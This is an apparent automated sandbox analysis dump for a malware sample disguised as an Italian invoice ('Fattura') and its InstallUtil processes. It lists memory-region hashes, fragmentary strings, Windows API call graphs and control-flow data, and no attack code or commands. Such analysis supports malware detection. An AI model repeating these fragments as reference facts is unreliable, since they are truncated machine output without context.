                                                                                • Opcode Fuzzy Hash: 738501fe80bed6698205b0ae368fa47af464392e0bb07fc755f8baf5a3e02f90
                                                                                • Instruction Fuzzy Hash: 46C02B3304A7048BD160227DA08EB7233EDDB06307F045400880C0141346E44410CED5
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7b9832ffb6238501587a47aaf415992641ebaf2edcc19a44cd6b9615704e2ccc
                                                                                • Instruction ID: 21befee902bdd89b1262e57c7450fb29bbf9e0badaddaa467e8ed75381f0f69a
                                                                                • Opcode Fuzzy Hash: 7b9832ffb6238501587a47aaf415992641ebaf2edcc19a44cd6b9615704e2ccc
                                                                                • Instruction Fuzzy Hash: 66C08C30F021289BEF109758D810B7C29AAAF40B84F84019AEA03AB390C8B45E418FC9
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d7c3a9feabf78d0de07fd34b64d6772740af33116ba9c5913edad7e87ed14ab4
                                                                                • Instruction ID: b8020478162f41150a919be08b714ad8ec97938ffc7c88ce9dbff47077111fd5
                                                                                • Opcode Fuzzy Hash: d7c3a9feabf78d0de07fd34b64d6772740af33116ba9c5913edad7e87ed14ab4
                                                                                • Instruction Fuzzy Hash: 91C048A804F3C82ED3078238AC1CCA37FAC5C8316038A00CAA080EF063D0489A8893B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4b863bb421ea5b267d8dcc1be6673c5ea547f43eff573f7777a857b6f72cdcef
                                                                                • Instruction ID: de7cf81e9007f3fa743f7bc8423d452b42b8e76ef26909080207979ab2065b91
                                                                                • Opcode Fuzzy Hash: 4b863bb421ea5b267d8dcc1be6673c5ea547f43eff573f7777a857b6f72cdcef
                                                                                • Instruction Fuzzy Hash: 29C04C2080A3C98FCF464778986D5027F749D4330071740E6D081DB077D228555DCB22
                                                                                Strings
                                                                                • oviders = $request.SelectProvidersWithFeature($script:SupportsPSModulesFeatureName) foreach($provider in $modul, xrefs: 0A0332F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: oviders = $request.SelectProvidersWithFeature($script:SupportsPSModulesFeatureName) foreach($provider in $modul
                                                                                • API String ID: 0-63563998
                                                                                • Opcode ID: 5c5123941d3f3e4fd6f746ef45859aa251dd711cf16a1d7caa6a43160d973590
                                                                                • Instruction ID: 9221be03f784792cb2ac5e3b9a6b8d72afd462716de9512b7e905ec5a4a0a629
                                                                                • Opcode Fuzzy Hash: 5c5123941d3f3e4fd6f746ef45859aa251dd711cf16a1d7caa6a43160d973590
                                                                                • Instruction Fuzzy Hash: 4E311C71E1021CDFDB58CF6AD9557EEBBFAAB88300F10C0AAD909A7350DB7459468F41
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e1fd8386820bf00461c2616eb81250641be9a1500832428adeac6528b627c269
                                                                                • Instruction ID: 49e729857660cba4a9a9e3b8a33fc13b4c790c9a57ccae8312a2f4f7b8ddb7e5
                                                                                • Opcode Fuzzy Hash: e1fd8386820bf00461c2616eb81250641be9a1500832428adeac6528b627c269
                                                                                • Instruction Fuzzy Hash: 82915B31F04208CFEF14DB69C488BAAB7B7EB88341F5AC966D2159B645C774E885CF90
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2b8b6505760d3ca6943c8f74f794f5731e4695108f11a6b11ddd8e152da8295b
                                                                                • Instruction ID: 27d0bfc29b07a552f6d63c14368f9c289c28f88c88f9bacbb10b31f254954aca
                                                                                • Opcode Fuzzy Hash: 2b8b6505760d3ca6943c8f74f794f5731e4695108f11a6b11ddd8e152da8295b
                                                                                • Instruction Fuzzy Hash: 18813874D05328CFDB24DFB9C844BADBBB6BF49300F2480A9D909A7641DB749A85CF41
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423528202.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a0e0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7eccba3ac06dcc008af9b316476f8bdccfbd4bc7921a488f3840a7e4515fa2cc
                                                                                • Instruction ID: d21eaecbfa220180e5c11f7b4ade5dd15e46f4af67468d31d50264256eda935a
                                                                                • Opcode Fuzzy Hash: 7eccba3ac06dcc008af9b316476f8bdccfbd4bc7921a488f3840a7e4515fa2cc
                                                                                • Instruction Fuzzy Hash: 3381CAB1D056948FEB29CF2B9C846D5BFB3AFCA310F18C4EA94486B115D7720A85DF41
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423528202.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a0e0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d393827318419218261682d37fb331d0eb3e70bad5a36a3c661d67505e39199
                                                                                • Instruction ID: 3f7a80cc62a42c0fbb237ae088d581d89d8e2c83513cce0d7a058317c956f2e6
                                                                                • Opcode Fuzzy Hash: 0d393827318419218261682d37fb331d0eb3e70bad5a36a3c661d67505e39199
                                                                                • Instruction Fuzzy Hash: 1D514A71D056698BEB6CCF6B8D446CAFAF3AFC9300F14C1FA854CAA254DB704AC58E40
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423528202.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a0e0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d6ad7a95d50f9d408d6c5b9d916c9e67f7443a5e10e875bfa0406009f9cb1434
                                                                                • Instruction ID: 5791ef688069c885c4152a9948c88f0724c23671574408f2691bc9679fa7f1e1
                                                                                • Opcode Fuzzy Hash: d6ad7a95d50f9d408d6c5b9d916c9e67f7443a5e10e875bfa0406009f9cb1434
                                                                                • Instruction Fuzzy Hash: D541ECB5D1434C9FDB14CFA9D985BAEBBF1FB49300F24902AE824AB250D7789984CF45
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 97b4bdd0bb88494109810a344f865c36b01dbf86b94a6bab70bf5a30f876ca57
                                                                                • Instruction ID: 6b851a00b101e54cb24983149f2e80878cbb5230badd2e1a409541bc7c99a5e0
                                                                                • Opcode Fuzzy Hash: 97b4bdd0bb88494109810a344f865c36b01dbf86b94a6bab70bf5a30f876ca57
                                                                                • Instruction Fuzzy Hash: 93411B74D05628CBEB28CF2ACD48799FBF6AB89304F01C1EA940CA7615DB741AC5CF01
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4e37a427225192d7e4a3638a08a74ffa149facdf8403ce672d93ce65214556a2
                                                                                • Instruction ID: 734b29fe810d008853e9d6ef7122eccd4b68be508d635d72acf2311c19bf9fc7
                                                                                • Opcode Fuzzy Hash: 4e37a427225192d7e4a3638a08a74ffa149facdf8403ce672d93ce65214556a2
                                                                                • Instruction Fuzzy Hash: 5441FEB5D05258DFDB10CFA9D580AEEFBF0AF49310F14846AE455B7240C778AA49CF68
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f42ad8bfda797c2b3c7d89d4f5ec10672061398e6f3fcfd6e244d9c3e15adbd1
                                                                                • Instruction ID: dd6c219befef23d038e12e84d485d68b120fdceeb977678336cf70604328d0a1
                                                                                • Opcode Fuzzy Hash: f42ad8bfda797c2b3c7d89d4f5ec10672061398e6f3fcfd6e244d9c3e15adbd1
                                                                                • Instruction Fuzzy Hash: F541FEB5C05258DFCB10CFA9D580AEEFBF4AB09310F14806AE414B7240C778AA49CF68
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8ab8e75deebaa8df39ad5de501788f548fcd11711a57a36c4e514b0c58862aa0
                                                                                • Instruction ID: 94a6e3cd75d70dc128450131f1838f35ada92ed08613326d5ae193a68028b1c8
                                                                                • Opcode Fuzzy Hash: 8ab8e75deebaa8df39ad5de501788f548fcd11711a57a36c4e514b0c58862aa0
                                                                                • Instruction Fuzzy Hash: 3E31EC71D057549FEB29CF6B8C4468ABBF6BF8A300F05C1EAD408AB125DB741986CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 94c8e2c661d035da279c0291e33968aca0821ff4db5d3105177254d071739681
                                                                                • Instruction ID: 5220cd35ea8ce484be0155fdb835fa756ff847c61235f44f79e3d955c563fbba
                                                                                • Opcode Fuzzy Hash: 94c8e2c661d035da279c0291e33968aca0821ff4db5d3105177254d071739681
                                                                                • Instruction Fuzzy Hash: CC21F0B5D152189FDB14CFA9D980AEEFBF4BB49310F14905AE805B7250C7356901CFA9
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6f843af43a45428e1f97c43132e88f760a3a6eb8fc4b02ef0b4de0271d9f4549
                                                                                • Instruction ID: d049675fcb68fada1cc1dfd4f10b39c1c3b75eb12f83da3602412f7b29de0dbf
                                                                                • Opcode Fuzzy Hash: 6f843af43a45428e1f97c43132e88f760a3a6eb8fc4b02ef0b4de0271d9f4549
                                                                                • Instruction Fuzzy Hash: 6721CFB6D152189FDB14CFA9D980AEEFBF4BB49310F14901AE815B7210C7356901CFA9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$Teq$Teq$Teq
                                                                                • API String ID: 0-767899262
                                                                                • Opcode ID: ef33c59123009efb5256081eb727170326e726f9237a3e17c2262b5d4794c0b4
                                                                                • Instruction ID: e1619aa747364e25c147d63168792fa7c67876271f1c3fbb1a13f2b5188e5f9c
                                                                                • Opcode Fuzzy Hash: ef33c59123009efb5256081eb727170326e726f9237a3e17c2262b5d4794c0b4
                                                                                • Instruction Fuzzy Hash: C73137F5F2420A8BEB28567498503BAB7929B87210B19407BD403CB392FEB5CC52C762
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'q$4'q$$q$$q
                                                                                • API String ID: 0-3199993180
                                                                                • Opcode ID: 04f81fe64a88dbb108cbbee3cda248550bd20281ea51ec2d959f2f834f96fee6
                                                                                • Instruction ID: fcdc357f0550e13e8ecb1b1cd89128d7eef7e3971a4901c5ce675b6769b482a4
                                                                                • Opcode Fuzzy Hash: 04f81fe64a88dbb108cbbee3cda248550bd20281ea51ec2d959f2f834f96fee6
                                                                                • Instruction Fuzzy Hash: E4018461B1A3C74FE72A127928202A56FB35FC351071A51E7E582DF2A3C9548D06C376

                                                                                Execution Graph

                                                                                Execution Coverage:9.4%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:3.6%
                                                                                Total number of Nodes:167
                                                                                Total number of Limit Nodes:20
                                                                                execution_graph 108107 668cdb8 108109 668cdd9 108107->108109 108108 668ce86 108109->108108 108112 668d1f0 KiUserExceptionDispatcher 108109->108112 108113 668d200 KiUserExceptionDispatcher 108109->108113 108112->108109 108113->108109 107938 569f818 107941 569fc38 107938->107941 107939 569f824 107942 569fc5b 107941->107942 107948 67f1be9 107942->107948 107954 67f176a 107942->107954 107943 569fce3 107943->107939 107946 569fca4 107947 675ef08 LdrInitializeThunk LdrInitializeThunk KiUserExceptionDispatcher KiUserExceptionDispatcher 107946->107947 107947->107943 107950 67f1770 107948->107950 107949 67f1682 107950->107949 107960 668d1f0 KiUserExceptionDispatcher 107950->107960 107961 668d200 KiUserExceptionDispatcher 107950->107961 107951 67f17f0 107956 67f1770 107954->107956 107955 67f1682 107956->107955 107962 668d1f0 KiUserExceptionDispatcher 107956->107962 107963 668d200 KiUserExceptionDispatcher 107956->107963 107957 67f17f0 107960->107951 107961->107951 107962->107957 107963->107957 108114 569c4b8 108115 569c4fe GetCurrentProcess 108114->108115 108117 569c550 GetCurrentThread 108115->108117 108120 569c549 108115->108120 108118 569c58d GetCurrentProcess 108117->108118 108121 569c586 108117->108121 108119 569c5c3 108118->108119 108130 569afd4 108119->108130 108120->108117 108121->108118 108124 569c6ab DuplicateHandle 108128 569c75e 108124->108128 108125 569c606 108127 569c610 GetCurrentThreadId 108125->108127 108129 569c641 108127->108129 108131 569c6c8 DuplicateHandle 108130->108131 108132 569c5f4 108131->108132 108132->108124 108132->108125 108133 569c798 108134 569c7a3 108133->108134 108135 569c7b3 108134->108135 108140 569afec 108134->108140 108136 569c7d3 108135->108136 108138 569c802 OleInitialize 108135->108138 108139 569c84c 108138->108139 108141 569c7e8 OleInitialize 108140->108141 108143 569c84c 108141->108143 108143->108135 107964 a5d5d0 107965 a5d610 CloseHandle 107964->107965 107967 a5d641 107965->107967 108144 a5d350 108146 a5d363 108144->108146 108148 a5d400 108146->108148 108149 a5d448 VirtualProtect 108148->108149 108151 a5d3e5 108149->108151 107931 5690d40 107932 5690d86 KiUserCallbackDispatcher 107931->107932 107934 5690dd9 107932->107934 107935 569c930 107936 569c98a OleGetClipboard 107935->107936 107937 569c9ca 107936->107937 107968 497fd28 107970 497fcc4 107968->107970 107969 497fd3d 107970->107969 107973 4f20b60 107970->107973 107976 4f20b4f 107970->107976 107974 4f20b69 107973->107974 107980 4f214fe 107973->107980 107974->107970 107977 4f20b60 107976->107977 107978 4f20b69 107977->107978 107979 4f214fe 3 API calls 107977->107979 107978->107970 107979->107978 107984 4f216e0 107980->107984 107987 4f216f0 107980->107987 107981 4f21504 107985 4f216f9 107984->107985 107990 4f21c40 107984->107990 107985->107981 107989 4f21c40 3 API calls 107987->107989 107988 4f216f9 107988->107981 107989->107988 107992 4f21c6b 107990->107992 107991 4f21c8d 107991->107985 107992->107991 107995 4f22400 107992->107995 108005 4f223f0 107992->108005 107996 4f22410 107995->107996 108015 4f26fd0 107996->108015 107997 4f22487 108023 4f2e1f2 107997->108023 108027 4f2e4a9 107997->108027 108031 4f2e3ee 107997->108031 107998 4f22509 108035 4f2e680 107998->108035 107999 4f22519 107999->107992 108006 4f22400 108005->108006 108011 4f26fd0 LdrInitializeThunk 108006->108011 108007 4f22487 108012 4f2e1f2 LdrInitializeThunk 108007->108012 108013 4f2e4a9 LdrInitializeThunk 108007->108013 108014 4f2e3ee LdrInitializeThunk 108007->108014 108008 4f22509 108010 4f2e680 2 API calls 108008->108010 108009 4f22519 108009->107992 108010->108009 108011->108007 108012->108008 108013->108008 108014->108008 108039 4f27833 108015->108039 108043 4f2778f 108015->108043 108047 4f275f7 108015->108047 108051 4f27554 108015->108051 108055 4f274e0 108015->108055 108059 4f274d0 108015->108059 108016 4f26fe9 108016->107997 108026 4f2e1fb 108023->108026 108024 4f2e253 108024->107998 108026->108024 108084 4f2b440 LdrInitializeThunk 108026->108084 108029 4f2e219 108027->108029 108028 4f2e253 108028->107998 108029->108027 108029->108028 108085 4f2b440 LdrInitializeThunk 108029->108085 108034 4f2e219 108031->108034 108032 4f2e253 108032->107998 108034->108032 108086 4f2b440 LdrInitializeThunk 108034->108086 108036 4f2e699 108035->108036 108087 4f2fa00 108035->108087 108091 4f2f9f1 108035->108091 108036->107999 108040 4f274f9 108039->108040 108041 4f27848 108040->108041 108063 4f2b520 108040->108063 108041->108016 108045 4f274f9 108043->108045 108044 4f27848 108044->108016 108045->108044 108046 4f2b520 LdrInitializeThunk 108045->108046 108046->108045 108049 4f274f9 108047->108049 108048 4f27848 108048->108016 108049->108048 108050 4f2b520 LdrInitializeThunk 108049->108050 108050->108049 108053 4f274f9 108051->108053 108052 4f27848 108052->108016 108053->108052 108054 4f2b520 LdrInitializeThunk 108053->108054 108054->108053 108057 4f274f9 108055->108057 108056 4f27848 108056->108016 108057->108056 108058 4f2b520 LdrInitializeThunk 108057->108058 108058->108057 108060 4f274f9 108059->108060 108061 4f27848 108060->108061 108062 4f2b520 LdrInitializeThunk 108060->108062 108061->108016 108062->108060 108068 4f2b660 108063->108068 108072 4f2b620 108063->108072 108077 4f2b651 108063->108077 108064 4f2b539 108064->108040 108071 4f2b66b 108068->108071 108070 4f2b68e 108070->108064 108071->108070 108081 4f2b440 LdrInitializeThunk 108071->108081 108073 4f2b62f 108072->108073 108076 4f2b66b 108072->108076 108073->108064 108075 4f2b68e 108075->108064 108076->108075 108082 4f2b440 LdrInitializeThunk 108076->108082 108080 4f2b65f 108077->108080 108079 4f2b68e 108079->108064 108080->108079 108083 4f2b440 LdrInitializeThunk 108080->108083 108081->108071 108082->108076 108083->108080 108084->108026 108085->108029 108086->108034 108088 4f2fa24 108087->108088 108095 4f2fe88 108088->108095 108089 4f2fa56 108089->108036 108092 4f2fa00 108091->108092 108094 4f2fe88 2 API calls 108092->108094 108093 4f2fa56 108093->108036 108094->108093 108099 5690c50 108095->108099 108103 5690c20 108095->108103 108096 4f2feb2 108096->108089 108100 5690c93 108099->108100 108101 5690cb1 MonitorFromPoint 108100->108101 108102 5690ce2 108100->108102 108101->108102 108102->108096 108104 5690c25 108103->108104 108105 5690cb1 MonitorFromPoint 108104->108105 108106 5690ce2 108104->108106 108105->108106 108106->108096
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ,q$4$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                                                                • API String ID: 0-2072453518
                                                                                • Opcode ID: d4068a2f24613b72c635aec23221064dae39fbe02eb0d5977568e4fbcf456ea5
                                                                                • Instruction ID: dc5e254cf5fba8b3fc12d6ceddec5b2b2c2a4204b06252003438fda6ab1dac2f
                                                                                • Opcode Fuzzy Hash: d4068a2f24613b72c635aec23221064dae39fbe02eb0d5977568e4fbcf456ea5
                                                                                • Instruction Fuzzy Hash: EEB20674A002288FDB24DFA5C894BADB7F6BF88301F158599E505AB3A4DB70ED45CF60
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ,q$4$$q$$q$$q$$q
                                                                                • API String ID: 0-3956183810
                                                                                • Opcode ID: 97b8fc322d598f8dfb93af9b8ae0bf33fb0a94f0425108a53a19927b35e1d210
                                                                                • Instruction ID: abb756d9237350f353b5bea3f019fa14f472b3bb745b25996aa00b876b0c7f50
                                                                                • Opcode Fuzzy Hash: 97b8fc322d598f8dfb93af9b8ae0bf33fb0a94f0425108a53a19927b35e1d210
                                                                                • Instruction Fuzzy Hash: B122EA74A00218CFDB24DF65C894BADB7F2BF88305F148599E509AB2A5DB70ED85CF60

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1155 552c0c8-552c0fa 1157 552c100-552c114 1155->1157 1158 552c519-552c537 1155->1158 1159 552c116 1157->1159 1160 552c11b-552c1dc 1157->1160 1163 552c93a-552c946 1158->1163 1159->1160 1206 552c1e2-552c1ea 1160->1206 1207 552c45b-552c47f 1160->1207 1164 552c545-552c551 1163->1164 1165 552c94c-552c960 1163->1165 1168 552c557-552c5e4 1164->1168 1169 552c92d-552c932 1164->1169 1188 552c5e6-552c5ec 1168->1188 1189 552c5fc-552c615 1168->1189 1175 552c937 1169->1175 1175->1163 1191 552c5f0-552c5f2 1188->1191 1192 552c5ee 1188->1192 1195 552c617-552c640 1189->1195 1196 552c645-552c683 1189->1196 1191->1189 1192->1189 1195->1175 1214 552c685-552c6a6 1196->1214 1215 552c6a8-552c6c2 1196->1215 1208 552c1f1-552c1f9 1206->1208 1209 552c1ec-552c1f0 1206->1209 1216 552c503-552c509 1207->1216 1211 552c1fb 1208->1211 1212 552c1fe-552c220 1208->1212 1209->1208 1211->1212 1222 552c222 1212->1222 1223 552c225-552c22b 1212->1223 1236 552c6c9-552c6cf 1214->1236 1215->1236 1220 552c516 1216->1220 1221 552c50b 1216->1221 1220->1158 1221->1220 1222->1223 1225 552c231-552c24b 1223->1225 1226 552c3e5-552c3f0 1223->1226 1230 552c28b-552c294 1225->1230 1231 552c24d-552c251 1225->1231 1228 552c3f2 1226->1228 1229 552c3f5-552c42b call 5527440 1226->1229 1228->1229 1269 552c453 1229->1269 1270 552c42d-552c451 call 55276f0 * 2 1229->1270 1232 552c29a-552c2aa 1230->1232 1233 552c4fe 1230->1233 1231->1230 1235 552c253-552c25b 1231->1235 1232->1233 1237 552c2b0-552c2c1 1232->1237 1233->1216 1239 552c261 1235->1239 1240 552c2e4-552c37d 1235->1240 1241 552c6d1-552c6ec 1236->1241 1242 552c6ee-552c740 1236->1242 1237->1233 1243 552c2c7-552c2d7 1237->1243 1244 552c264-552c266 1239->1244 1252 552c383-552c387 1240->1252 1253 552c484-552c498 1240->1253 1241->1242 1277 552c746-552c749 1242->1277 1278 552c84c-552c87c 1242->1278 1243->1233 1245 552c2dd-552c2e2 1243->1245 1249 552c26b-552c276 1244->1249 1250 552c268 1244->1250 1245->1240 1249->1233 1254 552c27c-552c287 1249->1254 1250->1249 1252->1253 1259 552c38d-552c39b 1252->1259 1253->1233 1258 552c49a-552c4b4 1253->1258 1254->1244 1260 552c289 1254->1260 1258->1233 1262 552c4b6-552c4d3 1258->1262 1263 552c3db-552c3df 1259->1263 1264 552c39d 1259->1264 1260->1240 1262->1233 1267 552c4d5-552c4f3 1262->1267 1263->1225 1263->1226 1268 552c3a3-552c3a5 1264->1268 1267->1233 1271 552c4f5 1267->1271 1272 552c3a7-552c3ab 1268->1272 1273 552c3af-552c3cb 1268->1273 1269->1207 1270->1269 1271->1233 1272->1273 1273->1233 1276 552c3d1-552c3d9 1273->1276 1276->1263 1276->1268 1280 552c814-552c83c 1277->1280 1281 552c74f 1277->1281 1290 552c898-552c8a7 1278->1290 1291 552c87e-552c896 1278->1291 1289 552c842-552c846 1280->1289 1283 552c756-552c782 1281->1283 1284 552c7e6-552c812 1281->1284 1285 552c787-552c7b3 1281->1285 1286 552c7b8-552c7e4 1281->1286 1283->1289 1284->1289 1285->1289 1286->1289 1289->1277 1289->1278 1292 552c8b0-552c912 1290->1292 1291->1292 1300 552c91d-552c92b 1292->1300 1300->1175
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1510276933.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_5520000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TJq$Teq$pq$xbq
                                                                                • API String ID: 0-2466396065
                                                                                • Opcode ID: c2c60e43498b78b9878f97188f56461033f67b8d1062d2b5f45d6c00f5e69bee
                                                                                • Instruction ID: 80007a4e374e8c8778a6d6a5736cb53fb2e4bceeef9116216acd51ba94681d89
                                                                                • Opcode Fuzzy Hash: c2c60e43498b78b9878f97188f56461033f67b8d1062d2b5f45d6c00f5e69bee
                                                                                • Instruction Fuzzy Hash: 24524B75A00624AFDB55CF68C984EADBBB2FF49304F1581A8E509AB276CB31EC51DF40
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: P^$Xx/
                                                                                • API String ID: 0-3322568364
                                                                                • Opcode ID: ad8f8822b2950fa944549120ae5388991b993bb08323d911a641f64610d21f17
                                                                                • Instruction ID: bcfb276ad71c0c34679901d8afea520173079fc59e9567e9592fd8115d80f3e6
                                                                                • Opcode Fuzzy Hash: ad8f8822b2950fa944549120ae5388991b993bb08323d911a641f64610d21f17
                                                                                • Instruction Fuzzy Hash: 5041A574A002189FDB98DFA9D859BADBBF5EB48340F5180A9E40ADB394DF346D41CF50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (q
                                                                                • API String ID: 0-2414175341
                                                                                • Opcode ID: 3f87565f0a8c7af9273a5287e9ab11f65c593780c5d484a6e0825a8a86d92450
